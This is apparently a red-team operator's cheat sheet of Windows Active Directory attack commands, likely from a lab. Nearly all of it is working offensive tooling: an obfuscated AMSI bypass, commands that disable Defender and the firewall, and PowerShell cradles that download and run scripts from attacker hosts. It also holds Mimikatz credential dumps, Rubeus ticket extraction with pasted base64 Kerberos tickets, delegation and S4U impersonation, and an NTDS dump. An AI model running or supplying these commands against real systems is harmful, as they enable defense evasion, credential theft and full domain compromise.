Remove Definations
execute -o cmd /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Get interactive shell and then bypass amsi
[Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true)
iex (new-object net.webclient).downloadstring("http://192.168.45.195/amsi"); iex (new-object net.webclient).downloadstring("http://192.168.45.195/test3.ps1");
iex (new-object net.webclient).downloadstring("http://10.90.0.254/test3.ps1");
test-wave -Command '"token::elevate" "lsadump::sam"'
test-wave -Command '"token::elevate" "privilege::debug" "sekurlsa::logonpasswords"'
test-wave -Command '"token::elevate" "privilege::debug" "sekurlsa::lsasecrets"'
Rubeus
iex (new-object net.webclient).downloadstring("http://192.168.45.195/amsi"); iex (new-object net.webclient).downloadstring("http://192.168.45.195/rub.ps1");
Invoke-Rubeus -Command 'tgtdeleg /service:krbtgt luid:0x5ed7dd /nowrap'
Invoke-Rubeus -Command 'triage'
Invoke-Rubeus -Command 'tgtdeleg /service:krbtgt /nowrap'
Invoke-Rubeus -Command 'dump /user:FILE06$ /service:krbtgt /nowrap'
Invoke-Rubeus -Command 'dump /service:ldap /luid:0x3e7 /nowrap'
./rubeustoccache.py doIFaDCCBWSgAwIBBaEDAgEWooIEXjCCBFphggRWMIIEUqADAgEFoRIbEENPUkUuQ1lCRVIuTE9DQUyiJTAjoAMCAQKhHDAaGwZrcmJ0Z3QbEENPUkUuQ1lCRVIuTE9DQUyjggQOMIIECqADAgESoQMCAQWiggP8BIID+Iome7Y27YuYdyIAB3+xPcWKS7usrqZp/cPrwn0d37piI/3aj0/t1ej3FudDkjgpBT2MoT4Q5MsgeMPw0lyGlWL3P7GdbZ65VP4xF5WNa3A0wTRY70zUs8qonuQFJBWX9wyondCTWRp2Cin5ugMOji9UNuQVuTbC7BybmVwC9gFtqXkxVyvwG/FrXks2rAA79ZsxvYpZWJv0mkOv5OeRO2GsoSsm1W//VKKZlxIm/nZ2k7aINilzZuE+6A/5ikWhj4PV3OV6tkPk3H0bLZtcgltyIYbsGvrldNv13DA3SAcJA8AMNJVztLmjCyqEErVsUlh6w+gbk70H0JpbgIrRXFRUBhVBXlXmSR3h5rRprPKHh2tpoptvmoXcqBR1mqwup1KG5DE02G46SSy51zOzA8JFvAFORx6UxsNWwXoK1+eLFtaYVr3gTwTlhzWy1TcOlA4SN4HA1yVYg9noFATvI7DND/3hd8bdCu/Ybk8koqS0p7tRkGgFAa648fvQN7MeEV6fvdAZqllFpAsuKMSyUdXBCtGORLO6WvsicIeLCS/TeeX7RbziFBed+OqTsbnH0i2fZT7khUwAm5p4+GlE0WqgTGJqtSgP9UBZ0QUdprzUwRVtHaI56XlHOVrvTJgolhff8yO2JAr4CqXfP14KEM9KAPjbGU2Vx7UAj32XMSZWvFX/rlOpDOL4wyL21kyP3sYSPuQN+TgLYvq///Rzgx7UITqOKuQkWOeU116DOvASG9YcJvYAK2EmFNuE86JtrBpse+DUOhRlGPsuSeb4RRVDpOvdWOxCcixN21hQsxxPPJGWLFfAU6JZruCMrWOvYkgRxoMTZoUIzoZccwIQ9K3FCkThNr/mbEVENeA247hpHVj4oxNRGXq13NURwg1D6+iyign3DTsByJ+qaML8gmvKRFxa0gIF3Nc5KwRGu5rRFshrfzt42uTSsdTxw4xJvhvNeJnZ47FS4AWQzcx4ZfLZ4L/Gip4yeKJQ+3BKbQbTlA021iecNmZKCaVBAWnuXiMn0PJgjeJeGUgOm+EvAM4gxlALVcKxVLkiVDS0k8AnKakcHU0GEHJWA9QnjdHBZOhsL9vji/ubT7/YS9Rcxbbpbx2p8EHM/R8/lAqFCp1QPgfE+LMkMfglMIaD2O5cDozprTM7ZNBrS7uRvwsknJvqVTmlK/dJ1XELuohQJlQJ+UsdbialpLtypXSznzI2ZYiGUbRNMvH67VymIYA0lGfeU/vQmN+OIJllD8xCmkve4UFdCRIJjULkggcF9feleCWw7zXfxSBbmiN15F9d3qWlNiA3fTRRLTcidxi4FjRWq2S06jZLHX8mwkS6B1kdiHmv9zPpHQoHo4H1MIHyoAMCAQCigeoEged9geQwgeGggd4wgdswgdigKzApoAMCARKhIgQgq0vwyuhO+uyfLeXrztS79VxwWkGMbHuumIgC4Z5+zdOhEhsQQ09SRS5DWUJFUi5MT0NBTKIYMBagAwIBAaEPMA0bC0lsZW5lLlJhc2NoowcDBQBgoQAApREYDzIwMjQwMzAyMDEwMDAxWqYRGA8yMDI0MDMwMjEwMzQxN1qnERgPMjAyNDAzMDkwMDM0MTdaqBIbEENPUkUuQ1lCRVIuTE9DQUypJTAjoAMCAQKhHDAaGwZrcmJ0Z3QbEENPUkUuQ1lCRVIuTE9DQUw= ilene1.kribi ilene1.ccache
Invoke-Rubeus -Command 's4u /impersonateuser:Administrator /msdsspn:time/m3webaw.m3c.local /user:svc_sql /altservice:http /ticket:doIE9jCCBPKgAwIBBaEDAgEWooIEBTCCBAFhggP9MIID+aADAgEFoQsbCU0zQy5MT0NBTKIeMBygAwIBAqEVMBMbBmtyYnRndBsJTTNDLkxPQ0FMo4IDwzCCA7+gAwIBEqEDAgEEooIDsQSCA629WjDAox0jgbqJ/DD9jzNLOb02q17JAGguWLQxzwRn9VLWtrnXlMl1cxhca9EiCtkR/aLEJuhfJjDy89tLv5r7tdSo5RekT6QS7PByg4FKh+FoW4qzF2SZEqG8CfYppXxrPMs9srD8oonXcUZ/nZPYkBBW9ldR7JDiL3VAkBZWrDE4whdlb9RLeIMLG0frpkgMjH6LKSThqC3wpXvyPsjSO3cZFn5qxxZc6trfi0Kh/i8rMuP0WPZQALxCPcd/K+254IE2vfyAMFu7DGzvWrlI88pFqEdLcHdBIus2PM1EQqWNi24x3vlqDEs2ga/Q2h+QmCweG4sQEjQLkDRArvuhl+/xa5CYJ1qjjKkJn4T/4JDtA89//XzuZvNB7LzwCuo3DdomfkyD1SdixYeSz7RyZOrtupZMeN0PWXZ7PWd2CLCkPYlW1oRXntkQQu7eXCTqD4nNoGwakYx4Rvj+E956AHbEsyxqudoYEYQDP16KWs2BrG8anRxHodYXeiuWmed5054y6EKgPnTv6Llu1GgWe9lVOHYD2KNqWgBkT5UIrqWd84xrb+ZUovVGrUL9tEaVUHp1bGIdEtlGQ9Xn8pEYOEfEnb1nTMBxlISTvqwZcI1XPlwXr/py9i2yEdB7rtAV1N/YYnD/hC4I650w0aT8kwtcNOOFANNxwsXFLVlO3Fjk9hGIuL33cTGytLRJIC3pw3WznCmx1PkMW+v3/V+I4EqqbCfu1jd0UTRtze5ApNZj9gJlDoetoUgAuLwS0joQVuZAxz5+FpY7eEQK3R0MS69WuznlWl/beJasQZ7DV0H46dpKd4T4Qnz8n77pdArX6vabpVGv+qbDqUYx5EWecJUPpyodjYEK5BhzSnrhY6KvhUU3hkafpakvOkPPQHBhibshNMTbsEsdyFUmndUquWsSDGbAnUHvsxM37REHRqqh7STjc0hgc2S+z9Jv5FlyUk3p3ZNyBB9oi34m4okWpR+nPqs66BWqaR22uG45ArXd9GSQ4M59c1LvT0YH7/jni8co5J2c04e9/t0iZ7rWUErcFQen6F7w+xXKJ+egH05Nbta8jVegNfQxxPlWJZ3TJ3hr2lP7ZUxS5SusfuSSJcvSc5asftHW1lLEJHy/v8ClzyXbSPMbzNh2tjQKuw4H5gA+LtSGwhg0N3QqkYHmuDs0uIEQFxmmHrngG+h/MVmh8ZHtbT4xDNvN1L8wR3K7d018b4rtyDGgWJQ8Kre2ZPVYSfm+tVoPFEUsD6OB3DCB2aADAgEAooHRBIHOfYHLMIHIoIHFMIHCMIG/oCswKaADAgESoSIEIN5eNdPcZOcj8wIcQKkKc6a3i9Bgn0/r9nPjvdpY6r6boQsbCU0zQy5MT0NBTKIUMBKgAwIBAaELMAkbB3N2Y19zcWyjBwMFAEDhAAClERgPMjAyNDAyMDkwMTAwMDFaphEYDzIwMjQwMjA5MTEwMDAxWqcRGA8yMDI0MDIxNjAxMDAwMVqoCxsJTTNDLkxPQ0FMqR4wHKADAgECoRUwExsGa3JidGd0GwlNM0MuTE9DQUw= /nowrap /ptt
ticketConverter.py svc_apache.kirbi svc_apache.ccache
export KRB5CCNAME=svc_apache.ccache
rbcd.py -delegate-from svc_apache -delegate-to M3DC$ -action 'write' 'm3c.local/svc_apache' -k -no-pass
getST.py -spn 'cifs/M3DC.m3c.local' -impersonate 'Norma.branham' 'm3c.local/svc_apache' -k -no-pass
export KRB5CCNAME=Norma.branham.ccache
cme smb 10.9.20.10 -u norma.branham --use-kcache --ntds
Disable AV
Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus
Disable Firewall
netsh advfirewall set allprofiles state off
netsh advfirewall set currentprofile state off